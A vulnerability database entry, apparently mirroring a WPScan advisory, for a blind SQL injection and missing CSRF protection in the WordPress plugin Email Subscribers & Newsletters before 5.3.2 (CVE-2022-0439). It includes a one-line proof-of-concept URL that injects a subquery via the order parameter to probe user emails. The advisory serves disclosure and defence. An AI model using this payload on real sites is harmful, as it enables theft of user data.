Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbKrzysztof ZającWPVDB-ID:729D3E67-D081-4A4E-AC1E-F6B0A184F095
HistoryFeb 11, 2022 - 12:00 a.m.

Email Subscribers & Newsletters < 5.3.2 - Subscriber+ Blind SQL injection

2022-02-1100:00:00
Krzysztof Zając
wpscan.com
10

0.001 Low

EPSS

Percentile

32.7%

JSON

The plugin does not correctly escape the order and orderby parameters to the ajax_fetch_report_list action, making it vulnerable to blind SQL injection attacks by users with roles as low as Subscriber. Further, it does not have any CSRF protection in place for the action, allowing an attacker to trick any logged in user to perform the action by clicking a link.

PoC

http://127.0.0.1:8001/wp-admin/admin-ajax.php?action=ajax_fetch_report_list&amp;order;=, (select 1 from wp_users where user_email like 0x6725 union select 2) -- g This will return an error result if there is an e-mail starting with g in the database.

CPENameOperatorVersion
email-subscriberslt5.3.2

Related

prion 1
cve 1
openvas 1
wpexploit 1
githubexploit 1
cvelist 1
nvd 1
prion
prion
Sql injection
2022-03-07 09:15:00
cve
cve
CVE-2022-0439
2022-03-07 09:15:09
openvas
openvas
WordPress Email Subscribers Plugin < 5.3.2 SQLi Vulnerability
2022-03-22 00:00:00
wpexploit
wpexploit
Email Subscribers & Newsletters < 5.3.2 - Subscriber+ Blind SQL injection
2022-02-11 00:00:00
githubexploit
githubexploit
Exploit for Cross-Site Request Forgery (CSRF) in Icegram Email Subscribers & Newsletters
2023-06-08 21:20:22
cvelist
cvelist
CVE-2022-0439 Email Subscribers & Newsletters < 5.3.2 - Subscriber+ Blind SQL injection
2022-03-07 08:16:41
nvd
nvd
CVE-2022-0439
2022-03-07 09:15:09

0.001 Low

EPSS

Percentile

32.7%

JSON
Related for WPVDB-ID:729D3E67-D081-4A4E-AC1E-F6B0A184F095
prion1cve1openvas1wpexploit1githubexploit1cvelist1nvd1